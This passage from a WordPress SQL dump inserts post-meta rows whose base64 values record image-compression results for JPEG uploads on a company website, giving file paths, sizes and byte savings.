IwMTZcLzA5XC9NUy01NjAtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTYwLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NjAtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozOTEsInRpbWUiOjE0ODM1NjQ1MTIsImlkIjoxNzY0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29228, 1763, 'wpfc_optimisation_reduction', '26857'); 
INSERT INTO `wp_postmeta` VALUES (29229, 1763, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjQ1MTcsImlkIjoiMTc2MyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTU1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MjQsInRpbWUiOjE0ODM1NjQ1MjAsImlkIjoxNzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzE0MCwidGltZSI6MTQ4MzU2NDUyMywiaWQiOjE3NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTU1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNzc5LCJ0aW1lIjoxNDgzNTY0NTI3LCJpZCI6MTc2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTMyNjYsInRpbWUiOjE0ODM1NjQ1MzEsImlkIjoxNzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjMzLCJ0aW1lIjoxNDgzNTY0NTM0LCJpZCI6MTc2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUzMywidGltZSI6MTQ4MzU2NDUzNywiaWQiOjE3NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTU1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MTEsInRpbWUiOjE0ODM1NjQ1NDEsImlkIjoxNzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTkxNywidGltZSI6MTQ4MzU2NDU0NCwiaWQiOjE3NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQyOCwidGltZSI6MTQ4MzU2NDU0NywiaWQiOjE3NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU4MiwidGltZSI6MTQ4MzU2NDU1MSwiaWQiOjE3NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY3NSwidGltZSI6MTQ4MzU2NDU1NCwiaWQiOjE3NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk4NSwidGltZSI6MTQ4MzU2NDU1NywiaWQiOjE3NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozODQsInRpbWUiOjE0ODM1NjQ1NjEsImlkIjoxNzYzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29230, 1762, 'wpfc_optimisation_reduction', '26730'); 
INSERT INTO `wp_postmeta` VALUES (29231, 1762, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMi5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY0NTY1LCJpZCI6IjE3NjIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtMi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTI1LCJ0aW1lIjoxNDgzNTY0NTY4LCJpZCI6MTc2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS0yLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTU1LTItODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMwOTEsInRpbWUiOjE0ODM1NjQ1NzIsImlkIjoxNzYyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS0yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtMi03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjcyNiwidGltZSI6MTQ4MzU2NDU3NSwiaWQiOjE3NjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS0yLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEzMjU3LCJ0aW1lIjoxNDgzNTY0NTc5LCJpZCI6MTc2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS0yLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTU1LTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYzOCwidGltZSI6MTQ4MzU2NDU4MywiaWQiOjE3NjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS0yLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzMsInRpbWUiOjE0ODM1NjQ1ODYsImlkIjoxNzYyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTUtMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjA4LCJ0aW1lIjoxNDgzNTY0NTkwLCJpZCI6MTc2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1NS0yLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTU1LTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE5NDMsInRpbWUiOjE0ODM1NjQ1OTMsImlkIjoxNzYyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS0yLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MTYsInRpbWUiOjE0ODM1NjQ1OTYsImlkIjoxNzYyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS0yLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1NzUsInRpbWUiOjE0ODM1NjQ2MDAsImlkIjoxNzYyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS0yLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NjMsInRpbWUiOjE0ODM1NjQ2MDMsImlkIjoxNzYyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTUtMi00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS0yLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo5NzMsInRpbWUiOjE0ODM1NjQ2MDYsImlkIjoxNzYyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTU1LTItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1NS0yLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6MzgyLCJ0aW1lIjoxNDgzNTY0NjA5LCJpZCI6MTc2Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (29232, 1761, 'wpfc_optimisation_reduction', '247'); 
